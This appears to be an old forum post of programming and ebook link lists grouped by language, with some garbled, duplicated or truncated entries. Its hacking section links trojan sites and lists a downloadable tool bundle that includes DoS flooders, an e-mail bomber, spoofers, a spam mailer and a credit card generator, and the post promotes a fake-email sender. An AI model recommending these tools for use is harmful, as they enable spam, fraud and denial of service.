30, http://alaska.mine.nu/books/
31, http://poprocks.dyn.ns.ca/dave/books/
32, http://58-160.skarland.uaf.edu/books/
33, http://202.186.247.194/~ebook/
34, http://hooligans.org/reference/
35, http://freecomputerbooks.com/
36, http://sleekfreak.ath.cx:81/books/
37, http://www.cs.wisc.edu/~chilimbi/Pubs.html
38, http://www.sysadminmag.com/
39, http://www.dotcomma.org/
40, http://www.dspguide.com/pdfbook.htm (Digital Processing)
41, http://sunsite.auc.dk/hwb/ (The Hardware Book)
42, http://www.b213.net/ (Huge Library on Everything)
Tutorials, Books, Utils, Misc
01, http://www.ebooksportal.org/ (Lots of Books)
02, http://www.techbooksforfree.com/ (Free Books)
03, http://www.freeprogrammingresources.com/books.html (Tutorials)
04, http://programmersheaven.com/ ( tutorials, examples, utils)
05, http://www.maththinking.com/boat/booksIndex.html ( books )
06, http://computer.howstuffworks.com/ ( ALL )
07, http://www.developer.com/
08, http://programmingtutorials.com/ ( tutorials )
09, http://www.sysinternals.com/ntw2k/utilities.shtml (freeware utils)
10, http://www.wotsit.org/ ( file formats )
11, http://www.catb.org/~esr/faqs/hacker-howto.html ( How to be a hacker )
12, http://www.echoecho.com
13, http://www.programmerstools.org/ (Windows Programming Tools)
14, http://www.scriptsearch.com/
15, http://www.oreilly.com/openbook/ (O'Reilly Books)
16, http://sysadmin.oreilly.com/ ( O'Reilly Books)
17, http://www.hoganbooks.com/freebook/webbooks.html
18, http://www.informit.com/itlibrary/
19, http://www.fore.com/support/manuals/home/home.htm
20, http://www.cs.columbia.edu/netbook/ (The Network Book)
21, http://www.cs.bell-labs.com/cm/cs/pearls/
22, http://202.159.16.55/~pimpa2000
23, http://202.159.15.46/~om-pimpa/buku
24, http://www.eastcoastfx.com/docs/admin-guides/
25, http://www.eastcoastfx.com/~jorn/reading/
26, http://www.cs.monash.edu.au/~alanf/se_proj97/
27, http://www.redbooks.ibm.com/
28, http://solaris.inorg.chem.msu.ru/cs-books/
29, http://sweetrude.net/~cab/books/
30, http://alaska.mine.nu/books/
31, http://poprocks.dyn.ns.ca/dave/books/
32, http://58-160.skarland.uaf.edu/books/
33, http://202.186.247.194/~ebook/
34, http://hooligans.org/reference/
35, http://freecomputerbooks.com/
36, http://sleekfreak.ath.cx:81/books/
37, http://www.cs.wisc.edu/~chilimbi/Pubs.html
38, http://www.sysadminmag.com/
39, http://www.dotcomma.org/
40, http://www.dspguide.com/pdfbook.htm (Digital Processing)
41, http://sunsite.auc.dk/hwb/ (The Hardware Book)
42, http://www.b213.net/ (Huge Library on Everything)
Visual Basic
Visual Basic
1. http://www.freevbcode.com/
2. http://www.vbtutor.net/vbtutor.html
3. http://www.a1vbcode.com
4. http://www.vbip.com
5. http://www.vbcode.com
6. http://www.qbasic.com/ (QBasic)
7. http://www.vb-world.net/books/
Java
1. http://java.sun.com/ ( API's, Examples, Tutorials )
2. http://www.mindprod.com/jgloss.html
3. http://java.sun.com/
4. http://www.javafaq.nu/
5. http://www.mindview.net/Books/TIJ/ (Book, Thinking in Java)
6. http://polaris.cis.ksu.edu/~schmidt/CIS200/
7. http://www.cs.brown.edu/courses/cs016/book/
TCL / TK
http://tcl.tk ( Tcl/Tk info, with man pages )

Source Code / Examples

1. http://oopsilon.com
2. http://sf.net
3. http://www.planetsourcecode.com
4. http://www.hotscripts.com
ASM
01. http://asmcompo.org ( ASM Competition )
02. http://webster.cs.ucr.edu/AoA/DOS/ (Art of ASM Book)
03. irc://irc.efnet.co.uk/asm ( ASM on IRC )
04. http://linuxassembly.org/ ( Linux ASM )
05. http://intel.com/ ( Intel )
06. http://amd.com/ ( ASM Manual )
07. http://www.madwizard.org ( x86 ASM )
08. http://win32asm.cjb.net/ ( x86 ASM )
09. http://www.masm32.com ( x86 ASM )
10. http://nasm.sourceforge.net/wakka.php?wakka=HomePage ( x86 ASM )
OS Development
1. irc://irc.freenode.com/osdev ( OS/Low Level projects )
2. http://my.execpc.com/~geezer/osd/

Windows Programming / .NET
1. http://www.winprog.net
2. http://msdn.microsoft.com/
3. http://www.codeproject.com
Python
1. http://www.python.org/topics/learn/
2. http://www.awaretek.com/tutorials.html
3. http://diveintopython.org/
4. http://www.tutorialized.com/tutorials/Python/1
5. http://www.techtutorials.info/python.html
6. http://www.techiwarehouse.com/Python..._Tutorial.html

Delphi
1. http://www.delphi3000.com
2. http://www.delphicity.com
3. http://www.delphibasics.co.uk/
4. http://delphi.about.com/
5. http://www.lmc-mediaagentur.de/dpool.htm

C / C++
01. http://www.cplusplus.com/
02. http://c.rm-f.net
03. http://www.eskimo.com/~scs/C-faq/top.html
04. http://www.cprogramming.com/
05. http://davidrobins.net/code/cpp/EFnet_cpp_faq.html
06. http://cplus.about.com/od/beginnerct...blcplustut.htm
07. http://www.eskimo.com/~scs/cclass/notes/top.html
08. http://www.strath.ac.uk/IT/Docs/Ccourse/
09. http://www.cm.cf.ac.uk/Dave/C/CE.html
10. http://www.cprogramming.com/tutorial.html
11. http://www.cs.virginia.edu/c++programdesign/slides/
12. http://www.icce.rug.nl/docs/cplusplus/cplusplus.html

Game Programming / Graphics / AI Programming
1. http://www.gamedev.net/ (game programming)
2. http://ai-depot.com/Features/Tutorials.html ( AI Programming )
3. http://nehe.gamedev.net/ (Some great OpenGL Tutorials)
4. http://gpwiki.org

Markup Languages
1. http://www.w3schools.com/
2. http://webmonkey.wired.com/webmonkey/programming/

Perl / CGI
01. http://www.cpan.org (Modules)
02. http://www.gossland.com/course/index.html (tutorial)
03. http://www.perlmonks.org/index.pl?node=Tutorials (tutorials)
04. http://archive.ncsa.uiuc.edu/General...ing/PerlIntro/ (tutorial)
05. http://www.sthomas.net/oldpages/robe...l-tutorial.htm (tutorial)
06. http://www.cgi101.com/
07. http://www.perlarchive.com/
08. http://www.webdesigns1.com/perl/ir.html
09. http://www.ictp.trieste.it/texi/perl/perl_toc.html
10. http://www.itknowPHP
01. http://www.php.net/
02. http://www.w3schools.com/php/default.asp
03. http://webmonkey.wired.com/webmonkey...php/index.html
04. http://www.webscriptsdirectory.com/P...uthentication/
05. http://www.hotscripts.com/PHP/Script...uthentication/
06. http://www.phpfreaks.com/scripts/Use...ication/16.php
07. http://simplythebest.net/scripts/php...n_scripts.html
08. http://www.phpscriptsearch.com/0/PHP...uthentication/
09. http://www.php-csl.com/snippets/
10. http://www.phpbuilder.com/snippet/
11. http://www.spoono.com/php/snippets/
12. http://fundisom.com/phpsnippets/snip
13. http://www.phpsnippets.net/
14. http://www.faqts.com/ (FAQ)
15. http://www.phpwizard.net (Building dynamic sites with PHP)
16. http://www.evilwalrus.com/
17. http://www.thescripts.com/serversidescripting/php
18. http://www.security-forums.com/forum/php.ASPTear (Resource List)

Lisp
1. http://www.gigamonkeys.com/book/ Free Common Lisp Book
2. http://salaam.cs.buap.mx/EBOOKS/IA/MANUAL-LISP/
3. http://www.cs.tulane.edu/www/Villamil/lisp/

JavaScript
1. http://www.javascript.com
2. http://javascript.internet.com/
3. http://www.dynamicdrive.com/

DHTML
1. http://www.fwzone.net/showDetail.asp...=6&NewsId=4204
2. http://www.designerwiz.com/roberto/d...fects_list.htm
3. http://www.creativephp.com/Dhtml/Dhtml.php3
4. http://dynamicdrive.com/

Ruby
1. http://www.ruby-lang.org/

XML
1. http://www.devx.com/xml/
2. http://www.xml101.com

Object Oriented Programming
http://www.oopweb.com/

ADA
http://www.adahome.com/Tutorials/

Cobra
http://www.iona.com/hyplan/vinoski/ ledge.com/tpj/http:...com/~mjd/perl/
ASP
1. http://www.allthescripts.com/browse-69-0.html
2. http://www.webscriptsdirectory.com/A...uthentication/
3. http://www.codejunction.com/scripts/...authentication
4. http://www.matrix28.com/asp/User_aut...ation/index.pl
5. http://www.asp101.com/
6. http://www.4guysfromrolla.com/
7. http://www.asptoday.com/
8. http://haneng.com/

Linux / Unix
01. http://www.linuxdoc.org/docs.html (Linux documentation)
02. http://www.freebsd.org/tutorials/ (FreeBSD documentation)
03. http://osiris.imw.tu-clausthal.de:8888/ (Sun documentation)
04. http://uran.vvsu.ru:8888/ (Sun documentation)
05. http://tronche.com/gui/x/
06. http://www.cen.com/mw3/refs.html
07. http://www.gaijin.com/X/
08. http://developer.gnome.org/doc/GGAD/ggad.html
09. http://www.troll.no/qt/
10. http://www.arrakis.es/~rlarrosa/tutorial.html
11. http://www.ucs.ed.ac.uk/~unixhelp/index.html
12. http://www.uwsg.indiana.edu/usail/
13. http://www.franken.de/users/lorien/unix.html
14. http://www.cs.buffalo.edu/~milun/unix.programming.html
15. http://www.pathname.com/fhs/2.0/fhs-toc.html
16. http://www.linuxbase.com/




SQL / Databases
1. http://www.mysql.com
2. http://www.postgresql.org/
3. http://w3.one.net/~jhoffman/sqltut.htm
4. http://www.doc.mmu.ac.uk/STAFF/E.Ferneley/SQL/index.htm
5. http://www.daimi.au.dk/~oracle/sql/index.html
Hacking / Security
01. http://www.hackthissite.org/
02. http://www.cyberarmy.com/zebulun/
03. http://loginmatrix.com/hackme/
04. http://www.try2hack.nl/
05. http://roothack.org/
06. http://www.pulltheplug.com/
07. http://www.hellboundhackers.org/
08. http://www.rootthisbox.org/
09. http://theory.lcs.mit.edu/~rivest/crypto-security.html
10. http://www.oberlin.edu/~brchkind/cyphernomicon/
11. http://www.cacr.math.uwaterloo.ca/hac/ (Handbook of Applied Cryptography)
12. http://www.tunix.kun.nl/ptr/tcpip.html
13. http://www.cisco.com/univercd/cc/td/doc/product/ (Cisco Product Documentation)
14. http://www.rsasecurity.com/
15. http://www.kremlinencrypt.com/
16. http://cryptography.org/freecryp.htm
17. http://world.std.com/~franl/crypto/
18. http://www.e4m.net/
19. http://www.cybercrime.gov/crypto.html
20. http://www.crypto.com/
21. http://www.cryptome.org
22. http://www.security-forums.com/crypto
23. http://www.skuz.net/
24. http://packetstormsecurity.nl/trojans/
25. http://www.trojanforge.net/
26. http://www.areyoufearless.com/
27. http://www.dark-e.com
28. http://www.sub7.net/
29. http://bo2k.sourceforge.net/
30. http://www.tlsecurity.net/amt.htm
31. http://www.cultdeadcow.com/
32. http://www.anti-trojan.org/
33. http://www.sophos.com/
34. http://vil.mcafee.com/ (Virus Library)
35. http://www.firewallguide.com/
36. http://www.softbytelabs.com/Frames.html (Black Widow)
37. http://sandsprite.com/Sleuth (Web Sleuth)
38. http://www.immunitysec.com/spike.html (Spike Proxy)

super hacking tools

http://sectools.org/

hacking tools5

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time
Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/
Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and
Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color
Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in
pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File
Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net
Statistics, Interactive, Raw Packets, DNS, Whois, ARP,
Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols
supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse
Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP
Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) Extra Tools (nmap console & win32 version)
154) ...and many more tools for u.

here id the link

http://users.pandora.be/ahmadi/nettools.htm

A good fake emailer

try it

http://www.exefind.com/topmail-P17297.html

But u need a working smtp server for this....
but nowdays most of the fake smtp servers are put down,,,
hope u find a one for sending fake mail...

Top 100 Network Security Tools
Here is the list of top 100 powerful Network Security tools...

http://sectools.org/

Dictionary of Networking
DESCRIPTINO

At Last--Clear and Comprehensible Definitions of All the Networking Acronyms, Terms, and Abbreviations You Need to Know
The Dictionary of Networking is a highly readable, authoritative guide to the extensive--and often bewildering--terminology of network computing. This completely updated, expanded third edition spans all aspects of networking hardware and software--from peer-to-peer networks to enterprise wide area networks (WANs), the Internet, and internetworking--and covers every major network operating system. Topics include:
* Certification programs
* Communications
* Industry standards
* The Internet and intranets
* LANs, MANs, WANs
* Mobile and wireless computing
* Network administration
* Networking theory and concepts
* Operating systems and environments
* PC and server hardware
* Protocols
* Security
* Slang
* Voice and data transmissions
This book contains more than 3,000 entries. Abbreviations and acronyms are cross-referenced to their definitions, and many entries include additional cross-references to related entries. You'll find clear, concise definitions, acronyms and abbreviations defined in context.

DOWNLOAD LINK
http://www.uploading.com/?get=52I0P2MN

Size: 3MB